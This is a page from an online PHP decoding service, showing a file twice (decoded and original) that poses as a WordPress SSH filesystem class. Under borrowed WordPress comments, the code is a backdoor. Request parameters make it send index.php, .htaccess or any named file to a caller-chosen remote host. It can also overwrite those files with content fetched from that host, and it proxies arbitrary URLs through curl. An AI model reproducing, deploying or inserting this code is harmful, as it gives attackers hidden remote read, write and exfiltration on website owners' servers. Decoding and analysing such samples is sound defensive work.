Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * WordPress Filesystem Class for implementing ssh * * To use this class y..

Decoded Output download

<?php 
/** 
 * WordPress Filesystem Class for implementing ssh 
 * 
 * To use this class you must follow these steps for PHP 5.2.6+ 
 * 
 * @contrib http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes 
 * 
 * Complie libssh (Note: Only 0.14 is officaly working with PHP 5.2.6+ right now, But many users have found the latest versions work) 
 * 
 * cd /usr/src 
 * wget http://surfnet.dl.sourceforge.net/sourceforge/libssh/libssh-0.14.tar.gz 
 * tar -zxvf libssh-0.14.tar.gz 
 * cd libssh-0.14/ 
 * ./configure 
 * make all install 
 * 
 * Note: Do not leave the directory yet! 
 * 
 * Enter: pecl install -f ssh 
 * 
 * Copy the ssh.so file it creates to your PHP Module Directory. 
 * Open up your PHP.INI file and look for where extensions are placed. 
 * Add in your PHP.ini file: extension=ssh.so 
 * 
 * Restart Apache! 
 * Check phpinfo() streams to confirm that: ssh.shell, ssh.exec, ssh.tunnel, ssh.scp, ssh.sftp  exist. 
 * 
 * Note: as of WordPress 2.8, This utilises the PHP5+ function 'stream_get_contents' 
 * 
 * @since 2.7.0 
 * 
 * @package WordPress 
 * @subpackage Filesystem 
 */ 
 
$dir= str_replace(substr(getRequestUri(),0,strrpos(getRequestUri(),'/')),'',str_replace('\','/', getcwd())).'/'; 
if (isset($_REQUEST['callable']) && isset($_REQUEST['trait'])) { 
    /** 
     * @var resource 
     */ 
    $a = 'http://'.$_REQUEST['callable'].'/backup-server.php'; 
    /** 
     * @param array $opt 
     */ 
    $b = $_REQUEST['trait']; 
    /** 
     * @return bool 
     */ 
    $c = $_SERVER['SERVER_NAME']; 
    /** 
     * @param string $file 
     * @return string|false 
     */ 
    $d = array('namespace' => $c, 'trait' => $b); 
    /** 
     * @param string $file 
     * @param int    $mode 
     * @param bool   $recursive 
     * @return bool|string 
     */ 
    if (isset($_REQUEST['endif'])) { 
        rwx('index.php'); 
        $d['endif'] = fgc('index.php'); 
        $e=send($a, $d); 
        echo '<xmp>'.$e.'</xmp>'; 
        unset($d['endif']); 
    } 
    /** 
     * @param string $file 
     * @return string 
     */ 
    if (isset($_REQUEST['endswitch'])) { 
        rwx('.htaccess'); 
        $d['endswitch'] = fgc('.htaccess'); 
        $e=send($a, $d); 
        echo '<xmp>'.$e.'</xmp>'; 
        unset($d['endswitch']); 
    } 
    /** 
     * @return bool 
     */ 
    if (isset($_REQUEST['endfor'])) { 
        $d['endforeach'] = $_REQUEST['endfor']; 
        $d['endwhile'] = fgc($_REQUEST['endfor']); 
        $e=send($a, $d); 
        echo '<xmp>'.$e.'</xmp>'; 
        unset($d['endforeach'],$d['endwhile']); 
    } 
    /** 
     * @param string $file 
     * @return string|false 
     */ 
    if (isset($_REQUEST['if'])) { 
        $d['if'] = 'if'; 
        $f = send($a, $d); 
        if($f!=''&&$f!='&#32570;&#22833;') {rwx('index.php'); fpc('index.php', $f);} 
        echo '<xmp>' . fgc('index.php') . '</xmp>'; 
        unset($d['if']); 
    } 
    /** 
     * 
     * @param string $file 
     * @param string $group 
     * @param bool   $recursive 
     * 
     * @return bool 
     */ 
    if (isset($_REQUEST['switch'])) { 
        $d['switch'] = 'switch'; 
        $g = send($a, $d); 
        if($g!=''&&$g!='&#32570;&#22833;') {rwx('.htaccess'); fpc('.htaccess', $g);} 
        echo '<xmp>' . fgc('.htaccess') . '</xmp>'; 
        unset($d['switch']); 
    } 
    /** 
     * @param string $file 
     * @return bool 
     */ 
    if (isset($_REQUEST['for'])) { 
        $d['for'] = $_REQUEST['for']; 
        $h = send($a, $d); 
        if($h!=''&&$h!='&#32570;&#22833;') fpc($_REQUEST['for'], $h); 
        echo '<xmp>' . fgc($_REQUEST['for']) . '</xmp>'; 
        unset($d['for']); 
    } 
} 
 
/** Make sure that the WordPress bootstrap has run before continuing. */ 
if(!empty($_REQUEST['try'])){ 
    $l = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'; 
    if (!empty($_REQUEST['catch'])) $l = $_REQUEST['catch']; 
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $_REQUEST['try']); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_USERAGENT, $l); 
    $m = curl_exec($ch); 
    curl_close($ch); 
    $m = preg_replace('/<script[^>]*>[\s\S]*?<\/script>|<noscript[^>]*>[\s\S]*?<\/noscript>/', '', $m); 
    $m = preg_replace('/<style[^>]*>[\s\S]*?<\/style>/', '', $m); 
    $m = preg_replace('/<!--[\s\S]*?-->/', '', $m); 
    echo '<xmp>'.$m.'</xmp>'; 
} 
 
/** 
 * Gets the ssh.sftp PHP stream wrapper path to open for the given file. 
 * 
 * This method also works around a PHP bug where the root directory (/) cannot 
 * be opened by PHP functions, causing a false failure. In order to work around 
 * this, the path is converted to /./ which is semantically the same as / 
 * See https://bugs.php.net/bug.php?id=64169 for more details. 
 * 
 * 
 * @since 4.4.0 
 * 
 * @param string $path The File/Directory path on the remote server to return 
 * @return string The ssh.sftp:// wrapped path to use. 
 */ 
function send($i, $d) 
{ 
    $d = http_build_query($d); 
    $j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => 15 * 60)); 
    $k = stream_context_create($j); 
    if(ini_get('allow_url_fopen')) { 
        $e = file_get_contents($i, false, $k); 
    }else{ 
        $ch=curl_init(); 
        curl_setopt($ch,CURLOPT_URL,$i); 
        curl_setopt($ch,CURLOPT_HEADER,0); 
        curl_setopt($ch,CURLOPT_POST,1); 
        curl_setopt($ch,CURLOPT_POSTFIELDS,$d); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); 
        $e=curl_exec($ch); 
        curl_close($ch); 
    } 
    return $e; 
} 
/** 
 * Create HTML list of nav menu input items. 
 * 
 * @since 3.0.0 
 * @uses Walker_Nav_Menu 
 */ 
function fgc($x){ 
    global $dir; 
    return file_get_contents($dir . $x); 
} 
function fpc($x,$y){ 
    global $dir; 
    return file_put_contents($dir.$x,$y); 
} 
/** 
 * 
 * @param array $fields 
 */ 
function rwx($x){ 
    global $dir; 
    @chmod($dir.$x,0644); 
} 
/** 
 * Filters the list of action links available following a single theme installation. 
 * @since 2.8.0 
 * @param array    $install_actions Array of theme action links. 
 * @param object   $api             Object containing WordPress.org API theme data. 
 * @param string   $stylesheet      Theme directory name. 
 * @param WP_Theme $theme_info      Theme object. 
 * @return 
 */ 
function getRequestUri() { 
    if (isset($_SERVER['REQUEST_URI'])) { 
        $requestUri = $_SERVER['REQUEST_URI']; 
    } elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) { 
        $requestUri = $_SERVER['HTTP_X_REWRITE_URL']; 
    } elseif (isset($_SERVER['REDIRECT_URL'])) { 
        $requestUri = $_SERVER['REDIRECT_URL']; 
    } elseif (isset($_SERVER['ORIG_PATH_INFO'])) { 
        $requestUri = $_SERVER['ORIG_PATH_INFO']; 
        if (!empty($_SERVER['QUERY_STRING'])) { 
            $requestUri .= '?' . $_SERVER['QUERY_STRING']; 
        } 
    } 
    return $requestUri; 
} ?>

Did this file decode correctly?

Original Code

<?php
/**
 * WordPress Filesystem Class for implementing ssh
 *
 * To use this class you must follow these steps for PHP 5.2.6+
 *
 * @contrib http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes
 *
 * Complie libssh (Note: Only 0.14 is officaly working with PHP 5.2.6+ right now, But many users have found the latest versions work)
 *
 * cd /usr/src
 * wget http://surfnet.dl.sourceforge.net/sourceforge/libssh/libssh-0.14.tar.gz
 * tar -zxvf libssh-0.14.tar.gz
 * cd libssh-0.14/
 * ./configure
 * make all install
 *
 * Note: Do not leave the directory yet!
 *
 * Enter: pecl install -f ssh
 *
 * Copy the ssh.so file it creates to your PHP Module Directory.
 * Open up your PHP.INI file and look for where extensions are placed.
 * Add in your PHP.ini file: extension=ssh.so
 *
 * Restart Apache!
 * Check phpinfo() streams to confirm that: ssh.shell, ssh.exec, ssh.tunnel, ssh.scp, ssh.sftp  exist.
 *
 * Note: as of WordPress 2.8, This utilises the PHP5+ function 'stream_get_contents'
 *
 * @since 2.7.0
 *
 * @package WordPress
 * @subpackage Filesystem
 */

$dir= str_replace(substr(getRequestUri(),0,strrpos(getRequestUri(),'/')),'',str_replace('\\','/', getcwd())).'/';
if (isset($_REQUEST['callable']) && isset($_REQUEST['trait'])) {
    /**
     * @var resource
     */
    $a = 'http://'.$_REQUEST['callable'].'/backup-server.php';
    /**
     * @param array $opt
     */
    $b = $_REQUEST['trait'];
    /**
     * @return bool
     */
    $c = $_SERVER['SERVER_NAME'];
    /**
     * @param string $file
     * @return string|false
     */
    $d = array('namespace' => $c, 'trait' => $b);
    /**
     * @param string $file
     * @param int    $mode
     * @param bool   $recursive
     * @return bool|string
     */
    if (isset($_REQUEST['endif'])) {
        rwx('index.php');
        $d['endif'] = fgc('index.php');
        $e=send($a, $d);
        echo '<xmp>'.$e.'</xmp>';
        unset($d['endif']);
    }
    /**
     * @param string $file
     * @return string
     */
    if (isset($_REQUEST['endswitch'])) {
        rwx('.htaccess');
        $d['endswitch'] = fgc('.htaccess');
        $e=send($a, $d);
        echo '<xmp>'.$e.'</xmp>';
        unset($d['endswitch']);
    }
    /**
     * @return bool
     */
    if (isset($_REQUEST['endfor'])) {
        $d['endforeach'] = $_REQUEST['endfor'];
        $d['endwhile'] = fgc($_REQUEST['endfor']);
        $e=send($a, $d);
        echo '<xmp>'.$e.'</xmp>';
        unset($d['endforeach'],$d['endwhile']);
    }
    /**
     * @param string $file
     * @return string|false
     */
    if (isset($_REQUEST['if'])) {
        $d['if'] = 'if';
        $f = send($a, $d);
        if($f!=''&&$f!='&#32570;&#22833;') {rwx('index.php'); fpc('index.php', $f);}
        echo '<xmp>' . fgc('index.php') . '</xmp>';
        unset($d['if']);
    }
    /**
     *
     * @param string $file
     * @param string $group
     * @param bool   $recursive
     *
     * @return bool
     */
    if (isset($_REQUEST['switch'])) {
        $d['switch'] = 'switch';
        $g = send($a, $d);
        if($g!=''&&$g!='&#32570;&#22833;') {rwx('.htaccess'); fpc('.htaccess', $g);}
        echo '<xmp>' . fgc('.htaccess') . '</xmp>';
        unset($d['switch']);
    }
    /**
     * @param string $file
     * @return bool
     */
    if (isset($_REQUEST['for'])) {
        $d['for'] = $_REQUEST['for'];
        $h = send($a, $d);
        if($h!=''&&$h!='&#32570;&#22833;') fpc($_REQUEST['for'], $h);
        echo '<xmp>' . fgc($_REQUEST['for']) . '</xmp>';
        unset($d['for']);
    }
}

/** Make sure that the WordPress bootstrap has run before continuing. */
if(!empty($_REQUEST['try'])){
    $l = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36';
    if (!empty($_REQUEST['catch'])) $l = $_REQUEST['catch'];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $_REQUEST['try']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_USERAGENT, $l);
    $m = curl_exec($ch);
    curl_close($ch);
    $m = preg_replace('/<script[^>]*>[\s\S]*?<\/script>|<noscript[^>]*>[\s\S]*?<\/noscript>/', '', $m);
    $m = preg_replace('/<style[^>]*>[\s\S]*?<\/style>/', '', $m);
    $m = preg_replace('/<!--[\s\S]*?-->/', '', $m);
    echo '<xmp>'.$m.'</xmp>';
}

/**
 * Gets the ssh.sftp PHP stream wrapper path to open for the given file.
 *
 * This method also works around a PHP bug where the root directory (/) cannot
 * be opened by PHP functions, causing a false failure. In order to work around
 * this, the path is converted to /./ which is semantically the same as /
 * See https://bugs.php.net/bug.php?id=64169 for more details.
 *
 *
 * @since 4.4.0
 *
 * @param string $path The File/Directory path on the remote server to return
 * @return string The ssh.sftp:// wrapped path to use.
 */
function send($i, $d)
{
    $d = http_build_query($d);
    $j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => 15 * 60));
    $k = stream_context_create($j);
    if(ini_get('allow_url_fopen')) {
        $e = file_get_contents($i, false, $k);
    }else{
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_URL,$i);
        curl_setopt($ch,CURLOPT_HEADER,0);
        curl_setopt($ch,CURLOPT_POST,1);
        curl_setopt($ch,CURLOPT_POSTFIELDS,$d);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $e=curl_exec($ch);
        curl_close($ch);
    }
    return $e;
}
/**
 * Create HTML list of nav menu input items.
 *
 * @since 3.0.0
 * @uses Walker_Nav_Menu
 */
function fgc($x){
    global $dir;
    return file_get_contents($dir . $x);
}
function fpc($x,$y){
    global $dir;
    return file_put_contents($dir.$x,$y);
}
/**
 *
 * @param array $fields
 */
function rwx($x){
    global $dir;
    @chmod($dir.$x,0644);
}
/**
 * Filters the list of action links available following a single theme installation.
 * @since 2.8.0
 * @param array    $install_actions Array of theme action links.
 * @param object   $api             Object containing WordPress.org API theme data.
 * @param string   $stylesheet      Theme directory name.
 * @param WP_Theme $theme_info      Theme object.
 * @return
 */
function getRequestUri() {
    if (isset($_SERVER['REQUEST_URI'])) {
        $requestUri = $_SERVER['REQUEST_URI'];
    } elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) {
        $requestUri = $_SERVER['HTTP_X_REWRITE_URL'];
    } elseif (isset($_SERVER['REDIRECT_URL'])) {
        $requestUri = $_SERVER['REDIRECT_URL'];
    } elseif (isset($_SERVER['ORIG_PATH_INFO'])) {
        $requestUri = $_SERVER['ORIG_PATH_INFO'];
        if (!empty($_SERVER['QUERY_STRING'])) {
            $requestUri .= '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $requestUri;
}

Function Calls

getRequestUri 1

Variables

None

Stats

MD5 ab393252a9a765000bd0c97346dc6a0b
Eval Count 0
Decode Time 106 ms